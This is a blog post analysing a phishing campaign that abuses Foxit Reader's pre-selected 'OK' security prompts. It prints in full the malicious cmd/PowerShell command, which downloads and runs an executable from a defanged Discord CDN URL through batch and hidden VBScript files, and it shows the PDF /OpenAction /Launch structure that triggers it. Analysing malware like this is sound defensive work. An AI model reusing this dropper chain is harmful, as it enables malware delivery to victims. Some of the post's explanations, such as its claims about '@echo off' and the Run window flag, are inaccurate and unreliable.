Open in app

Sign in

Write

Sign in

Foxit Design Flaw Exploit-Technical Explanation of the malicious triggered command

Imène ALLOUCHE
7 min readMay 22, 2024

--

Released By: Imène ALLOUCHE

To provide context for this article’s Proof of Concept (PoC) explanation, I recommend reading my previous article on the “Flawed Design Attack on Foxit PDF Reader”

However, for those who prefer a brief refresher, here’s a concise breakdown of the Foxit PDF Reader Design Flaw Attack:

Quick Overview of Foxit Design Flaw Exploit

Cybersecurity researchers at Check Point have uncovered a campaign exploiting a vulnerability in Foxit Reader.

While most antivirus software wouldn’t detect this exploit (as it leverages a human element), Check Point managed to gather enough evidence to expose the attacker’s arsenal.

Here’s a breakdown of the key findings:

The Flaw in Foxit Reader: Malicious actors crafted booby-trapped PDFs that exploit a specific weakness in Foxit Reader. Unlike Adobe Reader, Foxit Reader displays pre-selected “OK” buttons in security warnings. This design flaw tricks unsuspecting users into granting permission for the PDF to execute hidden commands.

Second malicious pop-up [Credits to Checkpoint ]

PowerShell as a Weapon: These hidden commands utilize PowerShell, a built-in Windows scripting language, to download malware onto the victim’s machine. PowerShell’s versatility allows attackers to bypass traditional antivirus defenses.

A Diverse Arsenal: The downloaded malware belongs to various notorious families, including Agent Tesla (known for information stealing) and Remote Access Trojans (RATs) like NanoCore and Pony, which grant attackers complete control over the infected device.

Command Explanation

When the user clicks “OK” on the second pop-up, a malicious command is triggered. This command uses PowerShell, a built-in Windows scripting tool, to download a malicious file from a remote server and then execute it.

Debugger showing the command triggered [ Credits to Checkpoint ]

And here is the command triggered:

C:\Windows\System32\cmd.exe /c cD  %tEMP% &@echo powershell -Command 
"(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 
'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbsDecoded Deception: A Technical Deep Dive into the Foxit Reader Exploit Command

The seemingly simple command used in the Foxit Reader exploit conceals a multi-step process designed to evade suspicion and execute malicious code. Let’s break down each section to understand its technical functionalities:

1. Initiating the Command Prompt:

  • C:\Windows\System32\cmd.exe /c: This part launches the Windows Command Prompt (cmd.exe) located in the System32 directory. The /c flag specifies that the following command will be executed and the command prompt window will then close.

2. Changing Directory:

  • cD %tEMP%: This command changes the current directory to the user's temporary folder (%TEMP%). Temporary folders are often used by malware to store downloaded files and scripts as they can be easily deleted later to avoid detection.

3. Downloading the Malicious Payload:

  • @echo powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')" >> msd89h2j389uh.bat: This is the core of the malicious activity. This is where the danger and the exploit comes into hand, Let’s Break it Down:
@echo off
  • This suppresses the echo of the following command, making it invisible to the user in the command prompt window.
powershell
  • This keyword invokes the PowerShell scripting engine.
-Command
  • This flag specifies the command to be executed by PowerShell.
(New-Object Net.WebClient).DownloadFile(...)
  • This line creates a new instance of the Net.WebClient class, a built-in PowerShell object used for downloading files from web servers.
hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe
  • This is the URL of the malicious file (likely malware) hosted on a compromised Discord server (indicated by "hxxps").
payload.exe
  • This specifies the filename where the downloaded malware will be saved on the victim's machine.
>> msd89h2j389uh.bat
  • This redirects the output of the previous command (the download process) and appends it to a new file named msd89h2j389uh.bat. This creates a batch file containing no informative content, to make it appear less suspicious.

4. Creating a Delayed Execution Batch File (msd89h2j389uh.bat):

  • The following lines:
@echo timeout /t 5 >> msd89h2j389uh.bat 
&@echo start payload.exe >> msd89h2j389uh.bat

are likely appended to the msd89h2j389uh.bat` file created in the previous step. Let's break them down:

  • @echo off: Again, suppresses the echo of the following commands.
  • timeout /t 5: This command creates a five-second delay before executing the next command. This might be used by the attacker to give the impression that nothing is happening after the user clicks "OK" on the security warning.
  • start payload.exe: This line launches the downloaded malicious file (payload.exe).

5. Creating a VBScript for Persistence (encrypted.vbs):

  • The remaining lines:

&@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs 
&@echo Dim strArgs >> encrypted.vbs 
&@echo strArgs = "cmd /c msd89h2j389uh.bat"  >> encrypted.vbs
&@echo oShell.Run strArgs, 0, false >> encrypted.vbs

create a VBScript file named encrypted.vbs. VBScript is another scripting language that can be used to automate tasks on Windows systems. Here's what each line does:

  • Similar to previous lines, @echo off suppresses the echo of the following commands.
  • Set oShell = CreateObject ("Wscript.Shell"): creates a new object based on the Wscript.Shell class, which allows the script to interact with the Windows shell and execute programs.
  • The subsequent lines (Dim strArgs and so on) define a variable named strArgs and assign a string value to it. This string value is the command to execute the batch file created earlier.
  • oShell.Run strArgs, 0, false uses the "oShell" object to execute the command stored in the "strArgs" variable. The additional parameters "0" and "false" specify that the application should be shown with a normal window (0) and not wait for the application to exit before continuing the script (false).
  • and then the VBScript file created is executed
&dEl encrypted.vbsDecoded

Finaly, the hacker attempts to delete the “encrypted.vbs” file after its execution. The “&” symbol before the “del” command is likely a typo, as VBScript doesn’t use “&” for command chaining. It should be replaced with a “call” statement to execute the “del” command within the script itself. However, the intended functionality remains deleting the evidence of the VBScript file.

PDF file Static Analysis

This analysis go into the technical details of a malicious PDF exploiting a design flaw in Foxit Reader. We’ll dissect the PDF structure and the embedded command, highlighting the attacker’s strategy and the vulnerability it leverages.

.\pdf-parser.py .\mlw.pdf
PDF Comment '%PDF-1.1\r\n'
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R
  <<
    /OpenAction
      <<
        /S /Launch
        /Win
          <<
            /F (CMD)
            /P '(/c cD  %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\', \'payload.exe\')"'
          >>
        msd89h2j389uh.bat &@echo timeout
        / t 5
      >>
    msd89h2j389uh.bat &@echo start payload.exe
  >>
obj 2 0
 Type: /Pages
 Referencing: 3 0 R
  <<
    /Kids [ 3 0 R ]
    /Count 1
    /Type /Pages
  >>
obj 3 0
 Type: /Page
 Referencing: 5 0 R, 2 0 R, 4 0 R
  <<
    /Resources
      <<
        /Font
          <<
            /F1 5 0 R
          >>
      >>
    /MediaBox [ 0 0 795 842 ]
    /Parent 2 0 R
    /Contents 4 0 R
    /Type /Page
  >>
obj 4 0
 Type:
 Referencing:
 Contains stream
  <<
    /Length 1260
  >>
obj 5 0
 Type: /Font
 Referencing:
  <<
    /Subtype /Type1
    /Name /F1
    /BaseFont /Helvetica
    /Type /Font
  >>
xref
trailer
  <<
    /Size 6
    /Root 1 0 R
    /ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
  >>
startxref 1866
PDF Comment '%%EOF'

Dissecting the PDF Structure:

Catalog Object (obj 1 0): This object serves as the central hub of the PDF’s structure. It contains references to various elements like pages, fonts, and, crucially, the /OpenAction dictionary.
OpenAction Dictionary: defines an automated action that executes upon opening the PDF. In this case, it holds the key to the exploit.

The Malicious Payload: Decoded

OpenAction Key: While innocuous, this key plays an important role in the attack. It references an embedded command that dictates the action to be taken when the PDF is opened.

Launch Action (/S /Launch): is a key combination that instructs Foxit Reader to launch an external application (/Launch) and provides Windows-specific details (/Win) for the application.

Application and Parameters (/F /P): are keys that specify the target application (/F) and the parameters (/P) to be passed to it. In this case, the application is a command shell (CMD), and the parameters include a complex command leveraging PowerShell for malicious activity.

The Flawed Design and Social Engineering:

The /OpenAction feature can be beneficial for automated tasks within PDFs. However, attackers exploit this functionality by embedding malicious commands that trigger upon opening the document.

The design flaw in Foxit Reader, which presents a pre-selected “OK” button for security warnings, makes it easier for attackers to trick unsuspecting users into clicking through the prompts, ultimately granting permission for the malicious command to execute.

Technical Nuances:

The embedded command leverages PowerShell, a scripting language built into Windows, to download a malicious file from a remote server. This technique allows attackers to bypass traditional antivirus solutions that may not be configured to detect malicious PowerShell scripts.

The attackers obfuscated the script within the /P parameter using techniques like variable renaming or encoding to hinder analysis and detection.

Comparison with Adobe Reader:

/Launch Specificity: It’s important to note that the /Launch key might not be universally supported by all PDF readers. While it triggers the exploit in Foxit Reader, Adobe Reader does not be susceptible to this specific attack due to its implementation of the /OpenAction functionality.

Mitigations of the Threats:

  • There is always no better than Educating users about social engineering tactics and the importance of scrutinizing security warnings before clicking any button.
  • Consider using a PDF reader that is not vulnerable to this specific exploit in Foxit Reader. Adobe has for now proven itself to be a more secure version of PDF readers so consider using it instead.
  • Use antivirus solutions that can detect and block malicious file downloads initiated by PowerShell scripts.
Exploitation
Cybersecurity
Hacking
Cve
Vulnerability

--

--

Imène ALLOUCHE

Written by Imène ALLOUCHE

30 Followers

1CS student at ESI Algiers, CTF player and Cybersecurity enthusiast

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams